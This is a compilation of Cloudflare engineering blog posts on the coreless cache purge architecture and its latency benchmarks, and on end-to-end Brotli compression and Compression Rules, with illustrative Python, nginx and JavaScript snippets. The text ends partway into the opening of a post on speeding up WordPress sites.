We touched on the high level design of what we called the “coreless” purge system in part 1, but let’s dive deeper into what that design encompasses by following a purge request from end to end:

Step 1: Request received locally

An API request to Cloudflare is routed to the nearest Cloudflare data center and passed to an API Gateway worker. This worker looks at the request URL to see which service it should be sent to and forwards the request to the appropriate upstream backend. Most endpoints of the Cloudflare API are currently handled by centralized services, so the API Gateway worker is often just proxying requests to the nearest “core” data center, which has its own gateway services to handle authentication, authorization, and further routing. But for endpoints that aren’t handled centrally, the API Gateway worker must handle authentication and route authorization itself, and then proxy to an appropriate upstream. For cache purge requests, that upstream is a Purge Ingest worker in the same data center.

Step 2: Purges tested locally

The Purge Ingest worker evaluates the purge request to make sure it is processible. It scans the URLs in the body of the request to see if they’re valid, then attempts to purge the URLs from the local data center’s cache. This concept of local purging was a new step introduced with the coreless purge system allowing us to capitalize on existing logic already used in every data center.

By leveraging the same ownership checks our data centers use to serve a zone’s normal traffic on the URLs being purged, we can determine if those URLs are even cacheable by the zone. Currently more than 50% of the URLs we’re asked to purge can’t be cached by the requesting zones, either because they don’t own the URLs (e.g. a customer asking us to purge https://cloudflare.com) or because the zone’s settings for the URL prevent caching (e.g. the zone has a “bypass” cache rule that matches the URL). All such purges are superfluous and shouldn’t be processed further, so we filter them out and avoid broadcasting them to other data centers, freeing up resources to process more legitimate purges.

On top of that, generating the cache key for a file isn’t free; we need to load zone configuration options that might affect the cache key, apply various transformations, et cetera. The cache key for a given file is the same in every data center though, so when we purge the file locally we now return the generated cache key to the Purge Ingest worker and broadcast that key to other data centers instead of making each data center generate it themselves.

Step 3: Purges queued for broadcasting

[Diagram: a purge request arrives at a small data center; the Purge Ingest worker forwards it to a Purge Queue worker in a Tier 1 data center]

Once the local purge is done the Purge Ingest worker forwards the purge request with the cache key obtained from the local cache to a Purge Queue worker. The queue worker is a Durable Object worker using its persistent state to hold a queue of purges it receives and pointers to how far along in the queue each data center in our network is in processing purges.

The queue is important because it allows us to automatically recover from a number of scenarios such as connectivity issues or data centers coming back online after maintenance. Having a record of all purges since an issue arose lets us replay those purges to a data center and “catch up”.

But Durable Objects are globally unique, so having one manage all global purges would have just moved our centrality problem from a core data center to wherever that Durable Object was provisioned. Instead we have dozens of Durable Objects in each region, and the Purge Ingest worker looks at the load balancing pool of Durable Objects for its region and picks one (often in the same data center) to forward the request to. The Durable Object will write the purge request to its queue and immediately loop through all the data center pointers and attempt to push any outstanding purges to each.
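
To make the recovery property concrete, here is a conceptual sketch of the queue-plus-pointers idea in plain Python. This is illustrative only and not Cloudflare’s Workers/Durable Objects code; send_to_colo is a stand-in for the real broadcast call:

def send_to_colo(colo: str, purge: dict) -> bool:
    ...  # stand-in for the real network call; True means the colo acknowledged

class PurgeQueue:
    # Conceptual model: an append-only log of purges plus one pointer per
    # data center recording how far that data center has processed.
    def __init__(self, colos):
        self.log = []
        self.pointers = {colo: 0 for colo in colos}

    def enqueue(self, purge: dict) -> None:
        self.log.append(purge)
        for colo in self.pointers:
            self.push(colo)

    def push(self, colo: str) -> None:
        # Replay everything past the colo's pointer; if a send fails, the
        # pointer stays put and a later push "catches the colo up".
        while self.pointers[colo] < len(self.log):
            if not send_to_colo(colo, self.log[self.pointers[colo]]):
                break
            self.pointers[colo] += 1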

While benchmarking our performance we found our particular workload exhibited a “goldilocks zone” of throughput to a given Durable Object. On script startup we have to load all sorts of data like network topology and data center health–then refresh it continuously in the background–and as long as the Durable Object sees steady traffic it stays active and we amortize those startup costs. But if you ask a single Durable Object to do too much at once like send or receive too many requests, the single-threaded runtime won’t keep up. Regional purge traffic fluctuates a lot depending on local time of day, so there wasn’t a static quantity of Durable Objects per region that would let us stay within the goldilocks zone of enough requests to each to keep them active but not too many to keep them efficient. So we built load monitoring into our Durable Objects, and a Regional Autoscaler worker to aggregate that data and adjust load balancing pools when we start approaching the upper or lower edges of our efficiency goldilocks zone.

Step 4: Purges broadcast globally

[Diagram: across multiple regions, a Durable Object sends purges to fanout workers in other regions, and each fanout worker sends them to the smaller data centers in its region]

Once a purge request is queued by a Purge Queue worker it needs to be broadcast to the rest of Cloudflare’s data centers to be carried out by their caches. The Durable Objects will broadcast purges directly to all data centers in their region, but when broadcasting to other regions they pick a Purge Fanout worker per region to take care of their region’s distribution. The fanout workers manage queues of their own as well as pointers for all of their region’s data centers, and in fact they share a lot of the same logic as the Purge Queue workers in order to do so. One key difference is fanout workers aren’t Durable Objects; they’re normal worker scripts, and their queues are purely in memory as opposed to being backed by Durable Object state. This means not all queue worker Durable Objects are talking to the same fanout worker in each region. Fanout workers can be dropped and spun up again quickly by any metal in the data center because they aren’t canonical sources of state. They maintain queues and pointers for their region but all of that info is also sent back downstream to the Durable Objects who persist that data themselves, reliably.

But what does the fanout worker get us? Cloudflare has hundreds of data centers all over the world, and as we mentioned above we benefit from keeping the number of incoming and outgoing requests for a Durable Object fairly low. Sending purges to a fanout worker per region means each Durable Object only has to make a fraction of the requests it would if it were broadcasting to every data center directly, which means it can process purges faster.

On top of that, occasionally a request will fail to get where it was going and require retransmission. When this happens between data centers in the same region it’s largely unnoticeable, but when a Durable Object in Canada has to retry a request to a data center in rural South Africa the cost of traversing that whole distance again is steep. The data centers elected to host fanout workers have the most reliable connections in their regions to the rest of our network. This minimizes the chance of inter-regional retries and limits the latency imposed by retries to regional timescales.

The introduction of the Purge Fanout worker was a massive improvement to our distribution system, reducing our end-to-end purge latency by 50% on its own and increasing our throughput threefold.

Current status of coreless purge

We are proud to say our new purge system has been in production serving purge by URL requests since July 2022, and the results in terms of latency improvements are dramatic. In addition, flexible purge requests (purge by tag/prefix/host and purge everything) share and benefit from the new coreless purge system’s entrypoint workers before heading to a core data center for fulfillment.

The reason flexible purge isn’t also fully coreless yet is because it’s a more complex task than “purge this object”; flexible purge requests can end up purging multiple objects–or even entire zones–from cache. They do this through an entirely different process that isn’t coreless compatible, so to make flexible purge fully coreless we would have needed to come up with an entirely new multi-purge mechanism on top of redesigning distribution. We chose instead to start with just purge by URL so we could focus purely on the most impactful improvements, revamping distribution, without reworking the logic a data center uses to actually remove an object from cache.

This is not to say that the flexible purges haven’t benefited from the coreless purge project. Our cache purge API lets users bundle single file and flexible purges in one request, so the API Gateway worker and Purge Ingest worker handle authorization, authentication and payload validation for flexible purges too. Those flexible purges get forwarded directly to our services in core data centers pre-authorized and validated which reduces load on those core data center auth services. As an added benefit, because authorization and validity checks all happen at the edge for all purge types users get much faster feedback when their requests are malformed.

Next steps

While coreless cache purge has come a long way since the part 1 blog post, we’re not done. We continue to work on reducing end-to-end latency even more for purge by URL because we can do better. Alongside improvements to our new distribution system, we’ve also been working on the redesign of flexible purge to make it fully coreless, and we’re really excited to share the results we’re seeing soon. Flexible cache purge is an incredibly popular API and we’re giving its refresh the care and attention it deserves.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/rethinking-cache-purge-architecture/

Part 1: Rethinking Cache Purge, Fast and Scalable Global Cache Invalidation

14/05/2022

There is a famous quote attributed to a Netscape engineer: “There are only two difficult problems in computer science: cache invalidation and naming things.” While naming things does oddly take up an inordinate amount of time, cache invalidation shouldn’t.

In the past we’ve written about Cloudflare’s incredibly fast response times, whether content is cached on our global network or not. If content is cached, it can be served from one of Cloudflare’s cache servers, which are distributed across the globe and are generally a lot closer in physical proximity to the visitor. This saves the visitor’s request from needing to go all the way back to an origin server for a response. But what happens when a webmaster updates something on their origin and would like these caches to be updated as well? This is where cache “purging” (also known as “invalidation”) comes in.

Customers thinking about setting up a CDN and caching infrastructure consider questions like:

  • How do different caching invalidation/purge mechanisms compare?
  • How many times a day/hour/minute do I expect to purge content?
  • How quickly can the cache be purged when needed?

This blog will discuss why invalidating cached assets is hard, what Cloudflare has done to make it easy (because we care about your experience as a developer), and the engineering work we’re putting in this year to make the performance and scalability of our purge services the best in the industry.

What makes purging difficult also makes it useful

(i) Scale
The first thing that complicates cache invalidation is doing it at scale. With data centers in over 270 cities around the globe, our most popular users’ assets can be replicated at every corner of our network. This also means that a purge request needs to be distributed to all data centers where that content is cached. When a data center receives a purge request, it needs to locate the cached content to ensure that subsequent visitor requests for that content are not served stale/outdated data. Requests for the purged content should be forwarded to the origin for a fresh copy, which is then re-cached on its way back to the user.

This process repeats for every data center in Cloudflare’s fleet. And due to Cloudflare’s massive network, maintaining this consistency when certain data centers may be unreachable or go offline is what makes purging at scale difficult.

Making sure that every data center gets the purge command and remains up-to-date with its content logs is only part of the problem. Getting the purge request to data centers quickly so that content is updated uniformly is the next reason why cache invalidation is hard.  

(ii) Speed
When purging an asset, race conditions abound. Requests for an asset can happen at any time, and may not follow a pattern of predictability. Content can also change unpredictably. Therefore, when content changes and a purge request is sent, it must be distributed across the globe quickly. If purging an individual asset, say an image, takes too long, some visitors will be served the new version, while others are served outdated content. This data inconsistency degrades user experience, and can lead to confusion as to which version is the “right” version. Websites can sometimes even break in their entirety due to this purge latency (e.g. by upgrading versions of a non-backwards compatible JavaScript library).

Purging at speed is also difficult when combined with Cloudflare’s massive global footprint. For example, if a purge request is traveling at the speed of light between Tokyo and Cape Town (both cities where Cloudflare has data centers), just the transit alone (no authorization of the purge request or execution) would take over 180ms on average based on submarine cable placement. Purging a smaller network footprint may reduce these speed concerns while making purge times appear faster, but does so at the expense of worse performance for customers who want to make sure that their cached content is fast for everyone.

(iii) Scope
The final thing that makes purge difficult is making sure that only the unneeded web assets are invalidated. Maintaining a cache is important for egress cost savings and response speed. Webmasters’ origins could be knocked over by a thundering herd of requests if they purge all content needlessly. It’s a delicate balance of purging just enough: too much can result in both monetary and downtime costs, and too little will result in visitors receiving outdated content.

At Cloudflare, what to invalidate in a data center is often dictated by the type of purge. Purge everything, as you could probably guess, purges all cached content associated with a website. Purge by prefix purges content based on a URL prefix. Purge by hostname can invalidate content based on a hostname. Purge by URL or single file purge focuses on purging specified URLs. Finally, Purge by tag purges assets that are marked with Cache-Tag headers. These markers offer webmasters flexibility in grouping assets together. When a purge request for a tag comes into a data center, all assets marked with that tag will be invalidated.
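
For reference, these purge types map onto the public purge_cache API endpoint. Below is a minimal sketch using Python’s requests library, with the zone ID and API token as placeholders (purge by tag, hostname, and prefix are Enterprise features at the time of writing):

import requests

ZONE_ID = "<zone id>"        # placeholder
URL = f"https://api.cloudflare.com/client/v4/zones/{ZONE_ID}/purge_cache"
HEADERS = {"Authorization": "Bearer <api token>"}   # placeholder

# Purge by URL (single file purge)
requests.post(URL, headers=HEADERS,
              json={"files": ["https://example.com/styles.css"]})

# Purge by tag, hostname, or prefix
requests.post(URL, headers=HEADERS, json={"tags": ["product-images"]})
requests.post(URL, headers=HEADERS, json={"hosts": ["images.example.com"]})
requests.post(URL, headers=HEADERS, json={"prefixes": ["example.com/blog/"]})

# Purge everything
requests.post(URL, headers=HEADERS, json={"purge_everything": True})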

With that overview in mind, the remainder of this blog will focus on putting each element of invalidation together to benchmark the performance of Cloudflare’s purge pipeline and provide context for what performance means in the real-world. We’ll be reviewing how fast Cloudflare can invalidate cached content across the world. This will provide a baseline analysis for how quick our purge systems are presently, which we will use to show how much we will improve by the time we launch our new purge system later this year.

How does purge work currently?

In general, purge takes the following route through Cloudflare’s data centers.

  • A purge request is initiated via the API or UI. This request specifies how our data centers should identify the assets to be purged. This can be accomplished via cache-tag header(s), URL(s), entire hostnames, and much more.
  • The request is received by any Cloudflare data center and is identified to be a purge request. It is then routed to a Cloudflare core data center (a set of a few data centers responsible for network management activities).
  • When a core data center receives it, the request is processed by a number of internal services that (for example) make sure the request is being sent from an account with the appropriate authorization to purge the asset. Following this, the request gets fanned out globally to all Cloudflare data centers using our distribution service.
  • When received by a data center, the purge request is processed and all assets with the matching identification criteria are either located and removed, or marked as stale. These stale assets are not served in response to requests and are instead re-pulled from the origin.
  • After being pulled from the origin, the response is written to cache again, replacing the purged version.

Now let’s look at this process in practice. Below we describe Cloudflare’s purge benchmarking that uses real-world performance data from our purge pipeline.

Benchmarking purge performance design

In order to understand how performant Cloudflare’s purge system is, we measured the time it took from sending the purge request to the moment that the purge is complete and the asset is no longer served from cache.  

In general, the process of measuring purge speeds involves: (i) ensuring that a particular piece of content is cached, (ii) sending the command to invalidate the cache, (iii) simultaneously checking our internal system logs for how the purge request is routed through our infrastructure, and (iv) measuring when the asset is removed from cache (first miss).

This process measures how quickly cache is invalidated from the perspective of an average user.

  • Clock starts
    As noted above, in this experiment we’re using sampled RUM data from our purge systems. The goal of this experiment is to benchmark current data for how long it can take to purge an asset on Cloudflare across different regions. Once the asset was cached in a region on Cloudflare, we identified when a purge request was received for that asset. At that same instant, the clock started for this experiment. We include in this time any retries we needed to make (due to data centers missing the initial purge request) to ensure that the purge was done consistently across our network. The clock continues as the request transits our purge pipeline (data center > core > fanout > purge from all data centers).
  • Clock stops
    What caused the clock to stop was the purged asset being removed from cache, meaning that the data center is no longer serving the asset from cache in response to visitors’ requests. Our internal logging measures the precise moment that the cached content has been removed or expired, and from that data we were able to determine the following benchmarks for our purge types in various regions.

Results

We’ve divided our benchmarks in two ways: by purge type and by region.

We singled out Purge by URL because it identifies a single target asset to be purged. While that asset can be stored in multiple locations, the amount of data to be purged is strictly defined.

We’ve combined all other types of purge (everything, tag, prefix, hostname) together because the amount of data to be removed is highly variable. Purging a whole website or by assets identified with cache tags could mean we need to find and remove a multitude of content from many different data centers in our network.

Secondly, we have segmented our benchmark measurements by regions and specifically we confined the benchmarks to specific data center servers in the region because we were concerned about clock skews between different data centers. This is the reason why we limited the test to the same cache servers so that even if there was skew, they’d all be skewed in the same way.  

We took the latency from the representative data centers in each of the following regions and the global latency. Data centers were not evenly distributed in each region, but in total represent about 90 different cities around the world:  

  • Africa
  • Asia Pacific Region (APAC)
  • Eastern Europe (EEUR)
  • Eastern North America (ENAM)
  • Oceania
  • South America (SA)
  • Western Europe (WEUR)
  • Western North America (WNAM)

The global latency numbers represent the purge data from all Cloudflare data centers in over 270 cities globally. In the results below, global latency numbers may be larger than the regional numbers because it represents all of our data centers instead of only a regional portion so outliers and retries might have an outsized effect.

Below are the results for how quickly our current purge pipeline was able to invalidate content by purge type and region. All times are represented in seconds and divided into P50, P75, and P99 quantiles; “P50” means that 50% of the purges completed at the indicated latency or faster.

Purge By URL

Region    P50      P75      P99
AFRICA    0.95s    1.94s    6.42s
APAC      0.91s    1.87s    6.34s
EEUR      0.84s    1.66s    6.30s
ENAM      0.85s    1.71s    6.27s
OCEANIA   0.95s    1.96s    6.40s
SA        0.91s    1.86s    6.33s
WEUR      0.84s    1.68s    6.30s
WNAM      0.87s    1.74s    6.25s
GLOBAL    1.31s    1.80s    6.35s

Purge Everything, by Tag, by Prefix, by Hostname

Region    P50      P75      P99
AFRICA    1.42s    1.93s    4.24s
APAC      1.30s    2.00s    5.11s
EEUR      1.24s    1.77s    4.07s
ENAM      1.08s    1.62s    3.92s
OCEANIA   1.16s    1.70s    4.01s
SA        1.25s    1.79s    4.106s
WEUR      1.19s    1.73s    4.04s
WNAM      0.9995s  1.53s    3.83s
GLOBAL    1.57s    2.32s    5.97s

A general note about these benchmarks — the data represented here was taken from over 48 hours (two days) of RUM purge latency data in May 2022. If you are interested in how quickly your content can be invalidated on Cloudflare, we suggest you test our platform with your website.

Those numbers are good and much faster than most of our competitors. Even in the worst case, we see the time from when you tell us to purge an item to when it is removed globally is less than seven seconds. In most cases, it’s less than a second. That’s great for most applications, but we want to be even faster. Our goal is to get cache purge to as close as theoretically possible to the speed of light limit for a network our size, which is 200ms.

Intriguingly, LEO satellite networks may be able to provide even lower global latency than fiber optics because of the straightness of the paths between satellites that use laser links. We’ve done calculations of latency between LEO satellites that suggest that there are situations in which going to space will be the fastest path between two points on Earth. We’ll let you know if we end up using laser-space-purge.

Just as we have with network performance, we are going to relentlessly measure our cache performance as well as the cache performance of our competitors. We won’t be satisfied until we verifiably are the fastest everywhere. To do that, we’ve built a new cache purge architecture which we’re confident will make us the fastest cache purge in the industry.

Our new architecture

Through the end of 2022, we will continue this blog series, incrementally showing how we will become the fastest, most scalable purge system in the industry. We will continue to update you on how our purge system is developing and benchmark our data along the way.

Getting there will involve rearchitecting and optimizing our purge service, which hasn’t received a systematic redesign in over a decade. We’re excited to do our development in the open, and bring you along on our journey.

So what do we plan on updating?

Introducing Coreless Purge

The first version of our cache purge system was designed on top of a set of central core services including authorization, authentication, request distribution, and filtering, among other features that made it a high-reliability service. These core components ultimately became a bottleneck in terms of scale and performance as our network continued to expand globally. While most of our purge dependencies have been containerized, the message queue used was still running on bare metal, which led to increased operational overhead when our system needed to scale.

Last summer, we built a proof of concept for a completely decentralized cache invalidation system using in-house tech – Cloudflare Workers and Durable Objects. Using Durable Objects as a queuing mechanism gives us the flexibility to scale horizontally by adding more Durable Objects as needed and can reduce time to purge with quick regional fanouts of purge requests.

In the new purge system, we’re ripping out the reliance on core data centers and moving all of that functionality to every data center; we’re calling it coreless purge.

Here’s a general overview of how coreless purge will work:

  • A purge request will be initiated via the API or UI. This request will specify how we should identify the assets to be purged.
  • The request will be routed to the nearest Cloudflare data center where it is identified to be a purge request and be passed to a Worker that will perform several of the key functions that currently occur in the core (like authorization, filtering, etc).
  • From there, the Worker will pass the purge request to a Durable Object in the data center. The Durable Object will queue all the requests and broadcast them to every data center when they are ready to be processed.
  • When the Durable Object broadcasts the purge request to every data center, another Worker will pass the request to the service in the data center that will invalidate the content in cache (executes the purge).

We believe this re-architecture of our system built by stringing together multiple services from the Workers platform will help improve both the speed and scalability of the purge requests we will be able to handle.

Conclusion

We’re going to spend a lot of time building and optimizing purge because, if there’s one thing we learned here today, it’s that cache invalidation is a difficult problem but those are exactly the types of problems that get us out of bed in the morning.

If you want to help us optimize our purge pipeline, we’re hiring.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/part1-coreless-purge/

All the way up to 11: Serve Brotli from origin and Introducing Compression Rules

23/06/2023

Throughout Speed Week, we have talked about the importance of optimizing performance. Compression plays a crucial role by reducing file sizes transmitted over the Internet. Smaller file sizes lead to faster downloads, quicker website loading, and an improved user experience.

Take household cleaning products as a real-world example. It is estimated that “a typical bottle of cleaner is 90% water and less than 10% actual valuable ingredients”. Removing 90% of a typical 500ml bottle of household cleaner reduces the weight from 600g to 60g. This reduction means only a 60g parcel, with instructions to rehydrate on receipt, needs to be sent. Extrapolated across gallons of product, this weight reduction soon becomes a huge shipping saving for businesses, not to mention the environmental impact.

This is how compression works. The sender compresses the file to its smallest possible size, and then sends the smaller file with instructions on how to handle it when received. By reducing the size of the files sent, compression ensures the amount of bandwidth needed to send files over the Internet is a lot less. Where files are stored in expensive cloud providers like AWS, reducing the size of files sent can directly equate to significant cost savings on bandwidth.

Smaller file sizes are also particularly beneficial for end users with limited Internet connections, such as mobile devices on cellular networks or users in areas with slow network speeds.

Cloudflare has always supported compression in the form of Gzip. Gzip is a widely used compression algorithm that has been around since 1992 and provides file compression for all Cloudflare users. However, in 2013 Google introduced Brotli, which supports higher compression levels and better performance overall. Switching from Gzip to Brotli results in smaller file sizes and faster load times for web pages. We have supported Brotli since 2017 for the connection between Cloudflare and client browsers. Today we are announcing end-to-end Brotli support for web content: support for Brotli compression, at the highest possible levels, from the origin server to the client.

If your origin server supports Brotli, turn it on, crank up the compression level, and enjoy the performance boost.

Brotli compression to 11

Brotli has 12 levels of compression, ranging from 0 to 11, with 0 providing the fastest compression speed but the lowest compression ratio, and 11 offering the highest compression ratio but requiring more computational resources and time. During our initial implementation of Brotli five years ago, we identified compression level 4 as the best balance between bytes saved and compression time, without compromising performance.

Since 2017, Cloudflare has been using a maximum compression of Brotli level 4 for all compressible assets based on the end user’s “accept-encoding” header. However, one issue was that Cloudflare only requested Gzip compression from the origin, even if the origin supported Brotli. Furthermore, Cloudflare would always decompress the content received from the origin before compressing and sending it to the end user, resulting in additional processing time. As a result, customers were unable to fully leverage the benefits offered by Brotli compression.

Figure: the old world, in which Cloudflare requested only Gzip from the origin

With Cloudflare now fully supporting Brotli end to end, customers will start seeing our updated accept-encoding header arriving at their origins. Once available, customers can transfer, cache, and serve heavily compressed Brotli files directly to us, all the way up to the maximum level of 11. This will help reduce latency and bandwidth consumption. If the end user’s device does not support Brotli compression, we will automatically decompress the file and serve it either in its decompressed format or as a Gzip-compressed file, depending on the Accept-Encoding header.

Figure: full end-to-end Brotli compression support

Figure: the fallback path when the end user does not support Brotli compression

Customers can implement Brotli compression at their origin by referring to the appropriate online materials. For example, customers using NGINX can implement Brotli by following this tutorial and setting compression at level 11 within the nginx.conf configuration file as follows:

brotli on;
brotli_comp_level 11;
brotli_static on;
brotli_types text/plain text/css application/javascript application/x-javascript text/xml 
application/xml application/xml+rss text/javascript image/x-icon 
image/vnd.microsoft.icon image/bmp image/svg+xml;

Cloudflare will then serve these assets to the client at the exact same compression level (11) for the matching file brotli_types. This means any SVG or BMP images will be sent to the client compressed at Brotli level 11.
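
One quick way to sanity-check an origin configured this way is to request an asset while advertising only Brotli support and inspect the Content-Encoding response header. Below is a minimal sketch using Node’s built-in https module; the URL is a placeholder for your own origin asset:

// Ask the origin for Brotli only, then check what encoding it answered with.
// https.get() does not decompress, so the headers reflect the wire format.
const https = require('https');

https.get(
  'https://example.com/styles.css',          // placeholder: your origin asset
  { headers: { 'accept-encoding': 'br' } },  // advertise Brotli support only
  (res) => {
    console.log('content-encoding:', res.headers['content-encoding']); // expect 'br'
    console.log('content-length :', res.headers['content-length']);
    res.resume(); // drain the still-compressed body
  }
);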

Testing

We applied compression against a simple CSS file, measuring the impact of various compression algorithms and levels. Our goal was to identify potential improvements that users could experience by optimizing compression techniques. These results can be seen in the following table:

Test | Size (bytes) | % reduction of original file (higher is better)
Uncompressed response (no compression used) | 2,747 | n/a
Cloudflare default Gzip compression (level 8) | 1,121 | 59.21%
Cloudflare default Brotli compression (level 4) | 1,110 | 59.58%
Compressed with max Gzip level (level 9) | 1,121 | 59.21%
Compressed with max Brotli level (level 11) | 909 | 66.94%

By compressing with Brotli at level 11, users can reduce their file sizes by 19% compared to the best Gzip compression level. Additionally, the strongest Brotli compression level is around 18% smaller than the default level used by Cloudflare. This highlights a significant size reduction achieved by utilizing Brotli compression, particularly at its highest levels, which can lead to improved website performance, faster page load times, and an overall reduction in egress fees.
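
You can reproduce this kind of comparison locally. The sketch below uses Node’s built-in zlib module to compress the same asset with Gzip level 9 and Brotli levels 4 and 11 and print the resulting sizes; exact numbers will vary with the input file:

const zlib = require('zlib');
const fs = require('fs');

const data = fs.readFileSync('styles.css'); // any compressible text asset

// Gzip at its maximum level, and Brotli at the two levels discussed above.
const gzip9 = zlib.gzipSync(data, { level: 9 });
const br4 = zlib.brotliCompressSync(data, {
  params: { [zlib.constants.BROTLI_PARAM_QUALITY]: 4 },
});
const br11 = zlib.brotliCompressSync(data, {
  params: { [zlib.constants.BROTLI_PARAM_QUALITY]: 11 },
});

const pct = (n) => ((1 - n / data.length) * 100).toFixed(2) + '%';
console.log('original  :', data.length, 'bytes');
console.log('gzip -9   :', gzip9.length, 'bytes,', pct(gzip9.length), 'reduction');
console.log('brotli  4 :', br4.length, 'bytes,', pct(br4.length), 'reduction');
console.log('brotli 11 :', br11.length, 'bytes,', pct(br11.length), 'reduction');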

To take advantage of higher end-to-end compression rates, the following Cloudflare proxy features need to be disabled:

  • Email Obfuscation
  • Rocket Loader
  • Server Side Excludes (SSE)
  • Mirage
  • HTML Minification – JavaScript and CSS can be left enabled.
  • Automatic HTTPS Rewrites

This is because Cloudflare needs to decompress and access the body to apply the requested settings. Alternatively, a customer can disable these features for specific paths using Configuration Rules.

If any of these rewrite features are enabled, your origin can still send Brotli compression at higher levels. However, we will decompress, apply the enabled Cloudflare feature(s), and recompress on the fly using Cloudflare’s default Brotli level 4 or Gzip level 8, depending on the user’s accept-encoding header.

For browsers that do not accept Brotli compression, we will continue to decompress and send responses either Gzip-compressed or uncompressed.

Implementation

The initial step towards implementing Brotli from the origin involved constructing a decompression module that could be integrated into Cloudflare’s software stack. It allows us to efficiently convert the compressed bits received from the origin into the original, uncompressed file. This step was crucial, as numerous features, such as Email Obfuscation, and products like Cloudflare Workers rely on accessing the body of a response to apply customizations.

We integrated the decompressor into the core reverse web proxy of Cloudflare. This integration ensured that all Cloudflare products and features could access Brotli decompression effortlessly. It also allowed our Cloudflare Workers team to incorporate Brotli directly into Cloudflare Workers, so that Workers customers can interact with responses returned in Brotli or pass them through to the end user unmodified.
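
As a rough illustration of what this enables for Workers customers (a sketch, not code from the post): a Worker can now read a Brotli-encoded origin response as plain text, because the runtime decompresses it transparently, or return the response untouched so the compressed bytes pass straight through:

// Sketch: interact with a Brotli-encoded response, or pass it through.
export default {
  async fetch(request) {
    const response = await fetch(request);

    if (new URL(request.url).searchParams.has('inspect')) {
      // Reading the body yields decompressed text, whatever the origin sent.
      const body = await response.text();
      return new Response(body.replaceAll('http://', 'https://'), response);
    }

    // Pass-through: the compressed bytes and their Content-Encoding
    // header flow to the end user unmodified.
    return response;
  },
};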

Introducing Compression Rules – granular control of compression for end users

By default, Cloudflare compresses certain content types based on the Content-Type header of the file. Today we are also announcing Compression Rules for our Enterprise customers. With Compression Rules, you gain enhanced control over Cloudflare’s compression capabilities, enabling you to customize how and which content Cloudflare compresses to optimize your website’s performance.

For example, by using Cloudflare’s Compression Rules for .ktx files, customers can optimize the delivery of textures in WebGL applications, enhancing the overall user experience. Enabling compression minimizes bandwidth usage and ensures that WebGL applications load quickly and smoothly, even when dealing with large and detailed textures.

Alternatively, customers can disable compression or specify a preference for how we compress. For example, an infrastructure company may want to support only Gzip for its IoT devices but allow Brotli compression for all other hostnames.

Compression Rules use the filters that our other rules products are built on, with the added fields of Media Type and Extension type, allowing you to easily specify the content you wish to compress.

Deprecating the Brotli toggle

Brotli has been supported by some web browsers since 2016, and Cloudflare added Brotli support in 2017. As with all new web technologies, Brotli was relatively unknown at the time, so we gave customers the ability to selectively enable or disable Brotli via the API and our UI.

Now that Brotli has evolved and is supported by all major browsers, we plan to enable Brotli on all zones by default in the coming months, mirroring the Gzip behavior we currently support and removing the toggle from our dashboard. If browsers do not support Brotli, Cloudflare will continue to honor their accepted encoding types, such as Gzip or uncompressed, and Enterprise customers will still be able to use Compression Rules to granularly control how we compress data towards their users.

The future of web compression

We’ve seen great adoption and great performance for Brotli as the new compression technique for the web. Looking forward, we are closely following trends around new compression algorithms such as zstd, a possible next-generation compression algorithm.

At the same time, we’re looking to improve Brotli directly where we can. One development that we’re particularly focused on is shared dictionaries with Brotli. Whenever you compress an asset, you use a “dictionary” that helps the compression to be more efficient. A simple analogy of this is typing OMW into an iPhone message. The iPhone will automatically translate it into On My Way using its own internal dictionary.

OMW → On My Way

This internal dictionary has taken three characters and expanded them into nine characters (including spaces). Sending the three-character form instead saves six characters, which translates into performance benefits for users.

By default, the Brotli RFC defines a static dictionary that both clients and origin servers use. The static dictionary was designed to be general purpose and apply to everyone, balancing the size of the dictionary against the compression gains it can deliver. However, what if an origin could generate a bespoke dictionary tailored to a specific website? For example, a Cloudflare-specific dictionary would allow us to compress the words and phrases that appear repeatedly on our site, such as the word “Cloudflare”. The bespoke dictionary would be designed to compress these as heavily as possible, and a browser using the same dictionary would be able to translate them back.
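
Node’s zlib does not expose Brotli’s custom-dictionary hooks, but Deflate accepts a preset dictionary, which is enough to sketch the idea; the dictionary contents below are our own toy example:

const zlib = require('zlib');

// A bespoke dictionary: strings we expect to repeat on our pages.
const dictionary = Buffer.from('Cloudflare compression performance ');

const page = Buffer.from(
  'Cloudflare performance: compression at Cloudflare helps performance.'
);

// Compressing with the dictionary lets the encoder reference it instead
// of repeating the strings, so the output is typically smaller.
const plain = zlib.deflateSync(page);
const withDict = zlib.deflateSync(page, { dictionary });
console.log('no dictionary  :', plain.length, 'bytes');
console.log('with dictionary:', withDict.length, 'bytes');

// Both sides must hold the exact same dictionary to decode.
const decoded = zlib.inflateSync(withDict, { dictionary });
console.log(decoded.equals(page)); // true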

A new proposal by the Web Incubator CG aims to do just that, allowing you to specify your own dictionaries so that browsers can optimize compression further. We’re excited about contributing to this proposal and plan on publishing our research soon.

Try it now

Compression Rules are available now, with end-to-end Brotli being rolled out over the coming weeks, allowing you to improve performance, reduce bandwidth, and granularly control how Cloudflare handles compression for your end users.

Watch on Cloudflare TV

https://customer-rhnwzxvb3mg4wz3v.cloudflarestream.com/f1c71fdb05263b5ec3077e6e7acdb7e2/iframe?preload=true&poster=https%3A%2F%2Fcustomer-rhnwzxvb3mg4wz3v.cloudflarestream.com%2Ff1c71fdb05263b5ec3077e6e7acdb7e2%2Fthumbnails%2Fthumbnail.jpg%3Ftime%3D1s%26height%3D600


Source :
https://blog.cloudflare.com/this-is-brotli-from-origin/

Speeding up your (WordPress) website is a few clicks away

22/06/2023

Every day, website visitors spend far too much time waiting for websites to load in their browsers. This waiting is partially due to browsers not knowing which resources are critically important so they can prioritize them ahead of less-critical resources. In this blog we will outline how millions of websites across the Internet can improve their performance by specifying which critical content loads first with Cloudflare Workers and what Cloudflare will do to make this easier by default in the future.

Popular Content Management Systems (CMS) like WordPress have made attempts to influence website resource priority, for example through techniques like lazy loading images. When done correctly, the results are magical. Performance is optimized between the CMS and browser without needing to implement any changes or coding new prioritization strategies. However, we’ve seen that these default priorities have opportunities to improve greatly.

